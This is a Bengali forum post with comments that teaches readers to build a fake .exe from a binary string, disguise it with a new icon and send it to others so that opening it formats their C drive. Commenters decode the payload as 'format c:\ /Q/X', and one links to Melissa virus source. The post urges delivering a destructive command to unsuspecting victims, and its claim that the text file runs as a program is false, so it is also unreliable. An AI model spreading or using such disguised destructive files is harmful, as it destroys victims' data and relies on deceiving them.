আজকে একটা বাজে কাজ শিখাবো, আসলে সব কাজ ই জেনে রাখা উচিত। তবে আমার রিকোয়েস্ট প্লিজ কেউ এটি দিয়ে কারো ক্ষতি করবেন না। আজকে ছোট একটি কোডিং শিখাবো এই কোডিং দিয়ে আপনি যে কারো পিসির C ড্রাইভ ফরম্যাট করে দিতে পারবেন। প্লিজ কারো ক্ষতি করবেন না। নোটপ্যাডের এই কোডিং টি খুব ই মারাত্তক কেউ ভুলেও নিজের পিসি তে এপ্পলাই করবেন না। কারো কোন ক্ষতি হলে আমার দোষ নেই। এক ছোট ভাইয়ের রিকোয়েস্টে এই পোস্ট টি করলাম।
১। প্রথমে নোটপ্যাড ওপেন করেন।
২। নিচের কোডিং গুলো কপি করে নোটপ্যাড এ পেস্ট করে দিন [অবশ্যই কপি করে নিবেন]
01100110011011110111001001101101011000010111010000 100000011000110011101001011100 0010000000101111010100010010111101011000
৩। এবার এটি সেভ করুন pp.exe
৪। এবার এটির আইকন চেঞ্জ করুন
৫। এখন এটি যে কাউকে পাথিয়ে দিন যখন এটি কেউ ওপেন করবে তার C ড্রাইভ ফরম্যাট হয়ে যাবে।
[এটি থেকে বাচার ছোট কৌশল হল যে, যখন দেখবেন .exe ফরম্যাট এর কোন ফাইলের সাইজ অনেক বেশী ছোট তখন বুঝে নিবেন হয়ত কোন কাহিনী আসে এটার মাঝে কারন .exe ফরম্যাট এর ফাইল বেশির ভাব ক্ষেত্রেই বড় আকারের হয়ে থাকে। এখানে ছোট মানে ১কেবি থেকে ৯০কেবি সাইজ বুঝানো হয়েছে]
তবুও আপনাকে ধন্যবাদ।
আমি আমি নিজের পিসিতে পরিক্ষা করতে গিয়ে ধরা খেয়েছি।
ওয়াও!! দারুন বিষয়। যদিও কাজে লাগাতে পারবো না। তবে সাবধান করে দেবার জন্য ধন্যবাদ। দারুন আইডিয়া exe ফাইলের সাইজ তো আসলেই বেশি ছোট হয় না।
আল্লাহ মাপ করুক …….. ভুলে যদি ক্লিক হয়ে যায়? তয়লে তো আমি শেষ….
01100110011011110111001001101101011000010111010000
100000011000110011101001011100—-এটুকু copy paste করলেই হবে?নাকি 0010000000101111010100010010111101011000—এটাও লাগবে?
পুরোটা কপি করেন। আমি কি এটুকূ করতে বলছি?
পি পি রক্স
:D ভয় পাইলাম।।।।।।
Melissa Virus Source Code
http://pastebin.com/UwZga1Q3
Etar er onno name “I love You”.
ভাই ভয় পাইছি আমার এই কোড এর দরকার নাই ।
চেক করছি ……।।
eta ase[img]C:\Documents and Settings\akhalique\Desktop[/img]
আপনি তো হেভি সাহসী !
কাজ হয়না রাসেল ভাই বলছে ফরমেট করব ? কিন্তু করতে পারছেনা । ভয় এর কি আছে গেলে তো হার্ড ডিস্ক ই যাবে ।
এতে বিরাট একটা মেসেজ দেয়া আছে,
format c:\ /Q/X
এর মানে c থেকে শুরু করে সব ফরমেট করে দিবে ! :P
চমত্কার উপস্থাপনা ।অসাধারন লাগল ।
by the amar problem ta keu solv korte paren kina try koren plz
অনেক চেষ্টা করেও nero দিয়ে ডিভিডি ভিডিও মুডে রাইট করতে পারিনি ।কেউ বলতে পারেন কিভাবে ডিভিডি ডিস্ক ভিডিও ডিস্ক বানাবো যেগুলো যেকোন ডিভিডি player এ চালনো যায় ?সহজ কথায় যে মুভি গুলো বাজারে ডিভিডিতে(vob ফাইল আকারে থাকে)পাওয়া যায় আমি ঐ গুলো বানাতে চাচ্ছি
আপনি টিউনারপেজ হেল্প লাইন এ বলুন, কেউ নিশ্চই সাহায্য করবেন !
ধন্যবাদ !
নীরোর আপডেট গুল একা করতে পারে তবে ফাইল সাইজ একটু বেশী হয় ।আর একটি কনভার্টার দিয়ে করেছিলাম ১০ বছর আগে নাম মনে নেই ও টি খুব ভাল ছিল ।
ভাই, এই রকম post আগেও পেয়েছিলাম। ওই টা দিয়ে চেষ্টাও করেছিলাম, কাজ হয় নাই। আপানার পোস্ট আর সতর্ক বাণীর জন্য ধন্যবাদ। সেভ করে নিলাম চেষ্টা করে দেখব………
কিছুদিন আগে প্রায় এরকম একটা পোস্ট আমি করেছিলাম।
http://www.tunerpage.com/archives/25176
যাইহোক ধন্যবাদ।
আপনারটার কোড দেখলাম সেটার মিনিং দুর্বোধ্য ! যা পেলাম সেটা হলো “K%UAø” হয়তো আমি ঠিক মতো অনুবাদ করতে পারি নাই, পুদিনা পাতা ভাইএর টার অনুবাদ করলে এরকম আসে, “format c: /Q/X”
যা হোক আপনারটা কি টেস্ট করে দেখেছিলেন ?
রাসেল ভাই কিভাবে মিনিং বের করছেন ?
এত বড় বাঁশ হাতে নেয়া ঠিক না । যেকোন সময় কাউকে গুঁতো লাগতে পারে ।
code ta mone rakhar kono ticks thakle bolen
দারুন শিখলাম! অবশ্যই সব জেনে রাখা ভালো! তবে কেন এটা হয়, এটা নিয়ে বিস্তারিত জানালে খুশি হতাম আরও! :)
pp vhi .. thanks . সাবধান করে দেওয়ার জন্য । । ।